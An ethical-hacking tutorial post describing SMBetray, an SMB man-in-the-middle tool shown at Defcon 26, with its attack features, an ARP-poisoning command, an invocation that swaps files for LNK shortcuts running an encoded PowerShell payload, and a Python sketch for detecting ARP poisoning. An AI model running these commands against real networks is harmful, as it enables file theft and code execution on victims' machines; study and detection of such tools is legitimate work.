Ethical Hacking Tutorials


SMBetray – Backdooring and Breaking Signatures


Finally, since encryption is rarely ever used, at the bare minimum this tool allows for the stealing of files passed in cleartext over the network – which can prove useful for system enumeration, or damaging if the data intercepted is sensitive in nature (PCI, PII, etc).

Released at Defcon 26 in the talk “SMBetray – Backdooring and Breaking Signatures”

 

 

  • Passively download any file sent over the wire in cleartext
  • Downgrade clients to NTLMv2 instead of Kerberos
  • Inject files into directories when viewed by a client
  • Replace all files with a LNK with the same name to execute a provided command upon clicking
  • Replace only executable files with a LNK with the same name to execute a provided command upon clicking
  • Replace files with extension X with the contents of the file with extension X in the local provided directory
  • Replace files with the case-insensitive name X with the contents of the file sharing the same name in the provided directory

 

Installation

Requires a system using iptables

sudo bash install.sh 

 

Usage

First, run a bi-directional ARP-cache poisoning attack between your victim and their gateway or destination network shares, e.g.:

sudo arpspoof -i <iface> -c both -t <target_ip> -r <gateway_ip>

Then run smbetray with some attack modules:

sudo ./smbetray.py --passive ./StolenFilesFolder --lnkSwapAll "powershell -noP -sta -w 1 -enc AABCAD....(etc)" -I eth0
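
The usage steps above begin with ARP-cache poisoning, which shows up in the victim's neighbour table as one MAC address answering for several IPv4 addresses. The following detection sketch is an added example, not part of SMBetray or the original post; the sample `ip neigh show` output, the addresses and the `pinned` mapping of known-good MACs are constructed assumptions.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample of `ip neigh show` output on a poisoned client (not captured data).
SAMPLE_NEIGH = """\
192.0.2.1 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
192.0.2.50 dev eth0 lladdr 00:11:22:33:44:55 STALE
192.0.2.20 dev eth0 lladdr 66:77:88:99:aa:bb REACHABLE
192.0.2.77 dev eth0 FAILED
fe80::1 dev eth0 lladdr 00:11:22:33:44:55 router STALE
"""

LINE_RE = re.compile(r"^(\S+)\s+dev\s+(\S+)\s+lladdr\s+([0-9a-fA-F:]{17})\b")


def parse_neigh(text):
    """Return {(iface, ipv4): mac} for entries that carry a link-layer address."""
    table = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # FAILED/INCOMPLETE entries have no lladdr
        ip, iface, mac = m.group(1), m.group(2), m.group(3).lower()
        try:
            if ipaddress.ip_address(ip).version != 4:
                continue  # one host legitimately holds several IPv6 addresses
        except ValueError:
            continue
        table[(iface, ip)] = mac
    return table


def find_arp_anomalies(text, pinned=None):
    """Flag MACs shared by several IPv4 neighbours and pinned IPs whose MAC changed."""
    table = parse_neigh(text)
    by_mac = defaultdict(set)
    for (iface, ip), mac in table.items():
        by_mac[(iface, mac)].add(ip)
    findings = [("shared-mac", mac, sorted(ips))
                for (_, mac), ips in sorted(by_mac.items()) if len(ips) > 1]
    for ip, expected in sorted((pinned or {}).items()):
        seen = {mac for (_, addr), mac in table.items() if addr == ip}
        bad = sorted(seen - {expected.lower()})
        if bad:
            findings.append(("pinned-mismatch", ip, bad))
    return findings
```

A shared MAC can also be legitimate (proxy ARP, a host with several addresses), so treat findings as leads and confirm them against the pinned gateway address.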

 

Backdooring and Breaking Signatures: SMBetray Download

Updated: August 31, 2018 — 4:28 am
